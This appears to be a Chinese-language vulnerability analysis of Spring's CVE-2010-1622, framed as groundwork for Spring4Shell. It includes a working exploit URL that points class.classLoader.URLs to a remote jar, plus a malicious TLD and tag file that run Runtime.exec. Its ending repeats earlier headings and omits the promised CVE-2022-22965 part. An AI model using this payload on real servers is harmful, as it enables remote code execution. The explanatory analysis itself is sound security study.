Spring RCE漏洞分析：从CVE-2010-1622到CVE-2022-22965<\/h1>

1. 前言<\/h2>
本文详细分析Spring框架中的两个重要RCE漏洞：CVE-2010-1622和CVE-2022-22965（Spring4Shell）。这两个漏洞都涉及到Spring框架的参数绑定机制和类加载器的操作，其中CVE-2022-22965被认为是CVE-2010-1622的绕过版本。<\/p>

2. CVE-2010-1622漏洞分析<\/h2>

2.1 影响版本<\/h3>

Spring版本：

3.0.0 to 3.0.2<\/li>
2.5.0 to 2.5.6.SEC01 (社区版)<\/li>
2.5.0 to 2.5.7 (订阅客户版)<\/li> <\/ul> <\/li>
Tomcat版本：< 6.0.28<\/li>

使用Spring表单标签功能<\/li> <\/ul>

2.2 前置知识<\/h3>

2.2.1 Java Class对象<\/h4>

Java中有两种对象：通过new()创建的对象和Class对象<\/li>
Class类存在于java.lang包中，表示运行时类型信息<\/li>
每个类都有一个对应的Class对象，保存在.class文件中<\/li>

Class对象特点：

Class类也是类的一种<\/li>
手动编写的类编译后会产生Class对象<\/li>
每个类在内存中有且只有一个对应的Class对象<\/li>
Class对象只能由JVM创建和加载<\/li>

用于运行时获取类型信息（反射基础）<\/li> <\/ul> <\/li> <\/ul>

获取Class对象的方法：<\/p>

类名.class<\/li>
Class.forName()<\/li>

getClass()<\/li> <\/ol>

2.2.2 Java Bean<\/h4>

符合以下条件的类称为Java Bean：<\/p>

所有属性为private<\/li>
提供默认构造方法（无参构造）<\/li>
提供getter和setter<\/li>

实现Serializable接口<\/li> <\/ol>

2.2.3 Java内省(Introspector)<\/h4>

内省是Java对Bean类属性、事件的处理方法，通过Introspector类可以：<\/p>

获取BeanInfo信息<\/li>
通过BeanInfo获取属性描述器(PropertyDescriptor)<\/li>
通过属性描述器获取getter\/setter方法<\/li>

通过反射调用这些方法<\/li> <\/ol>

示例：<\/p>

BeanInfo beanInfo =<\/span> Introspector.<\/span>getBeanInfo<\/span>(<\/span>User.<\/span>class<\/span>);<\/span>
<\/span><\/span>PropertyDescriptor[]<\/span> pds =<\/span> beanInfo.<\/span>getPropertyDescriptors<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>注意：所有类都会继承Object的class属性，对应getClass()方法。<\/p>
2.2.4 Spring Bean<\/h4>

Spring Bean是Spring IoC容器管理的对象<\/li>
可以通过XML配置创建Bean<\/li>
示例：<\/li>
<\/ul>
<bean<\/span> id=<\/span>"bean1"<\/span> class=<\/span>"com.User"<\/span>><\/span>
<\/span><\/span>  <constructor-arg<\/span> value=<\/span>"zhangsan"<\/span>\/><\/span>
<\/span><\/span>  <constructor-arg<\/span> value=<\/span>"21"<\/span>\/><\/span>
<\/span><\/span><\/bean><\/span>
<\/span><\/span><\/code><\/pre>2.2.5 Spring MVC参数传递<\/h4>
Controller接收参数的方式：<\/p>

通过实体Bean接收<\/li>
通过方法形参接收<\/li>
通过HttpServletRequest接收<\/li>
通过@PathVariable接收<\/li>
通过@RequestParam接收<\/li>
通过@ModelAttribute接收<\/li>
<\/ol>
重点<\/strong>：参数嵌套绑定<\/p>

支持user.address.street=xxx<\/code>形式的参数<\/li>
相当于执行：UserObj.getUser().getAddress().setStreet("xxx")<\/code><\/li>
关键点<\/strong>：数组、List、Map类型的字段即使没有set方法也能赋值<\/li>
<\/ul>
2.2.6 Spring MVC表单标签<\/h4>

位于spring-webmvc.jar<\/li>
启用方式：<%@ taglib prefix="form" uri="http:\/\/www.springframework.org\/tags\/form" %><\/code><\/li>
常用标签：<form:form><\/code>, <form:input><\/code>等<\/li>
<\/ul>
2.2.7 JSP JSTL<\/h4>

JSP标准标签库<\/li>
可以自定义标签<\/li>
漏洞利用的关键：通过自定义标签实现RCE<\/li>
<\/ul>
2.3 漏洞利用分析<\/h3>
2.3.1 Payload<\/h4>
http:\/\/localhost:8080\/student?class.classLoader.URLs[0]=jar:http:\/\/127.0.0.1:8081\/spring-jar.jar!\/
<\/code><\/pre>
2.3.2 利用原理<\/h4>

通过参数绑定修改classLoader.URLs[0]<\/li>
触发TldLocationsCache.scanJars()加载远程jar<\/li>
远程jar中包含恶意TLD文件，覆盖Spring表单标签<\/li>
渲染JSP时执行恶意代码<\/li>
<\/ol>
2.3.3 关键点解析<\/h4>


为什么能修改URLs[0]？<\/strong><\/p>

通过内省机制可以访问class.classLoader属性<\/li>
URLs是数组类型，Spring允许没有setter的数组赋值<\/li>
<\/ul>
<\/li>

恶意jar包内容<\/strong><\/p>

结构：
\/META-INF\/spring-form.tld
\/META-INF\/tags\/InputTag.tag
<\/code><\/pre>
<\/li>
spring-form.tld内容：
<taglib<\/span> version=<\/span>"2.0"<\/span>><\/span>
<\/span><\/span>  <uri><\/span>http:\/\/www.springframework.org\/tags\/form<\/uri><\/span>
<\/span><\/span>  <tag-file><\/span>
<\/span><\/span>    <name><\/span>input<\/name><\/span>
<\/span><\/span>    <path><\/span>\/META-INF\/tags\/InputTag.tag<\/path><\/span>
<\/span><\/span>  <\/tag-file><\/span>
<\/span><\/span><\/taglib><\/span>
<\/span><\/span><\/code><\/pre><\/li>
InputTag.tag内容：
<%@ tag dynamic-attributes="dynattrs" %>
<% java.lang.Runtime.getRuntime().exec("calc"); %>
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

触发流程<\/strong><\/p>

exp → 参数自动绑定 → 数组覆盖classLoader.URLs[0] → WebappClassLoader.getURLs() → TldLocationsCache.scanJars() → 模板解析 → 执行shellcode<\/li>
<\/ul>
<\/li>
<\/ol>
2.4 漏洞修复<\/h3>


Spring修复<\/strong>：<\/p>

在CachedIntrospectionResults中添加classloader到黑名单<\/li>
<\/ul>
<\/li>

Tomcat修复<\/strong>：<\/p>

6.0.28版本后getURLs()返回clone的数组，防止修改原始URLs<\/li>
<\/ul>
<\/li>
<\/ol>
3. 总结<\/h2>
CVE-2010-1622漏洞展示了Spring框架参数绑定机制的潜在危险，特别是对类加载器属性的修改能力。理解这个漏洞需要掌握：<\/p>

Java内省机制<\/li>
Spring参数绑定特性<\/li>
JSP标签库加载机制<\/li>
Tomcat类加载器工作原理<\/li>
<\/ol>
这个漏洞为后续分析CVE-2022-22965（Spring4Shell）奠定了基础，两者在利用思路上有相似之处。<\/p>

Spring RCE漏洞分析：从CVE-2010-1622到CVE-2022-22965<\/h1>

1. 前言<\/h2> 本文详细分析Spring框架中的两个重要RCE漏洞：CVE-2010-1622和CVE-2022-22965（Spring4Shell）。这两个漏洞都涉及到Spring框架的参数绑定机制和类加载器的操作，其中CVE-2022-22965被认为是CVE-2010-1622的绕过版本。<\/p>

2. CVE-2010-1622漏洞分析<\/h2>

2.2 前置知识<\/h3>

2.3 漏洞利用分析<\/h3>

1. 前言<\/h2>
本文详细分析Spring框架中的两个重要RCE漏洞：CVE-2010-1622和CVE-2022-22965（Spring4Shell）。这两个漏洞都涉及到Spring框架的参数绑定机制和类加载器的操作，其中CVE-2022-22965被认为是CVE-2010-1622的绕过版本。<\/p>